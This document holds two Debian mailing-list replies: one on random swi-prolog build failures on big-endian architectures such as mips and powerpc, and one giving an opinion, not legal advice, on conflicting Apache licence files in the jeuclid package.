On Wed, Nov 15, 2017 at 12:55:12AM +0500, Lev Lamberov wrote: >... > The most strange thing is that 7.6.1-1 built successfully on mips. The > only difference between 7.6.1-1 and 7.6.1-2 is that java tests (only > tests) are disabled now (via debian/rules). 7.3.33+dfsg-1 failed the same way a year ago: https://buildd.debian.org/status/logs.php?pkg=swi-prolog=mips I would not rule out that this might be an old bug causing random build failures, that either just happened twice in the row or became more likely due to some change somewhere. > Note that the 7.6.1-2 > version builds successfully on mipsel and mips64el (little-endian), but > fails on mips (big-endian). > The similar problem occures on powerpc [1][2], which also works in > big-endian mode: >... Same randomness on powerpcspe, and both have it already with 7.6.1+dfsg-1: https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpc https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpcspe cu Adrian -- "Is there not promise of rain?" Ling Tan asked suddenly out of the darkness. There had been need of rain for many days. "Only a promise," Lao Er said. Pearl S. Buck - Dragon Seed
Bug#876733: Licensing of jeuclid
On Tue, 14 Nov 2017 15:55:40 +0100 Julien Puydtwrote: > Hi, > > according to bug #876733, there is a licensing problem with jeuclid : > - the LICENSE.txt file [1] says Apache 2.0 ; LICENSE.txt showed up in revision b9d5f518ae61 (61) as a rename of LICENSE. LICENSE showed up in revision 7a11e25aacfa (0) during a CVS import. support/LICENSE.txt shows up in revision 472677a11fef (683).. and is Apache-2.0. > - the NOTICE file [2] looks like an Apache 1.0. NOTICE also showed up in revision 7a11e25aacfa (0). NOTICE seems to be Apache-1.1 with word replacements. (not Apache-1.0) > My interpretation of the issue is that if there are two licenses on the > code, then as long as the necessary DFSG-rights are given, there is no > problem. I would argue that the Author's clear intention was to license this work under Apache-2.0. This is where the full license text is correctly copied. A LICENSE file is typically the authority to a project, so much so that many tools ignore a NOTICE file when checking licenses if a LICENSE file is present. Additionally, Apache-2.0 invalidates a contradicting license by paragraph 4(d). What's in NOTICE violates the license terms of what's in LICENSE. > Notice that upstream seems unreactive since years now, so even though > I'm also opening a ticket there [3], moving forward not expecting an > answer seems the most reasonable course of action. Considering the last commit was in 2012, a lack of response is not in any way surprising. You opened that ticket less than a day ago. > What do you think about the matter? I'd start by making an attempt to contact maxberger directly, and then definitely have some patience. They may be on vacation, experiencing health/family/existential problems, or prefer checking email infrequently. If you don't get a response, I would argue that the author's clear intent was to license the work under the Apache-2.0 license and believed the NOTICE file was meant for a more brief form of the file. I would make that argument based on the assumption that they didn't read the license, or the portion where it tells you what the brief form looks like. IANAL -- Michael Lustfield